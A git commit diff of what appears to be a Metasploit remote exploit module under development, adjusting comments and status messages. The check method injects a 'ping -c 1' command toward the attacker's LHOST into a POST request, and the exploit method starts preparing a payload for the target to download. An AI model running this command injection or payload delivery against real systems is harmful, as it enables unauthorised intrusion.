Fixed duplicate output for check.

GSoC/Meterpreter_Web_Console
Imran E. Dawoodjee 2018-10-08 11:19:24 +06:30
parent 272f26640b
commit 3340cf529c
No known key found for this signature in database
GPG Key ID: C624AF1BC0AFB44B
1 changed files with 4 additions and 7 deletions

View File

@ -86,7 +86,6 @@ class MetasploitModule < Msf::Exploit::Remote
File.read(datastore['URI_LIST']).each_line do |uri| File.read(datastore['URI_LIST']).each_line do |uri|
response_get = request_get(uri.chomp) response_get = request_get(uri.chomp)
if response_get && response_get.code == 200 if response_get && response_get.code == 200
# print_good("Got 200 OK for #{uri.chomp}")
return uri.chomp return uri.chomp
end end
end end
@ -96,16 +95,15 @@ class MetasploitModule < Msf::Exploit::Remote
# check for vulnerability existence # check for vulnerability existence
def check def check
lhost = datastore['LHOST'] # implied lhost = datastore['LHOST'] # implied, required for the "ping" check -_-
vuln_check_param = "ping -c 1 #{lhost}" vuln_check_param = "ping -c 1 #{lhost}" # make this an actual check instead of a ping
target_uri = find_uri target_uri = find_uri
if target_uri == "fail" if target_uri == "fail"
fail_with Failure::NotVulnerable, 'Target is not vulnerable.' fail_with Failure::NotVulnerable, 'Target is not vulnerable.'
else else
print_status("Checking for existence of vulnerability in #{target_uri}...")
response_post = request_post(target_uri,vuln_check_param) response_post = request_post(target_uri,vuln_check_param)
if response_post && response_post.code == 200 if response_post && response_post.code == 200 # and includes something that ensures that it's vulnerable
print_good("Got 200 OK for #{target_uri}") print_good("Got 200 OK for #{target_uri}") # also indicate that its vulnerable
return Exploit::CheckCode::Vulnerable return Exploit::CheckCode::Vulnerable
else else
return Exploit::CheckCode::Safe return Exploit::CheckCode::Safe
@ -120,7 +118,6 @@ class MetasploitModule < Msf::Exploit::Remote
unless [CheckCode::Vulnerable].include? check unless [CheckCode::Vulnerable].include? check
fail_with Failure::NotVulnerable, 'Target is not vulnerable.' fail_with Failure::NotVulnerable, 'Target is not vulnerable.'
end end
lhost = datastore['LHOST'].to_s lhost = datastore['LHOST'].to_s
downfile = datastore['URIPATH'] || rand_text_alpha(8+rand(8)) downfile = datastore['URIPATH'] || rand_text_alpha(8+rand(8))
resource_uri = '/' + downfile # the payload to be downloaded resource_uri = '/' + downfile # the payload to be downloaded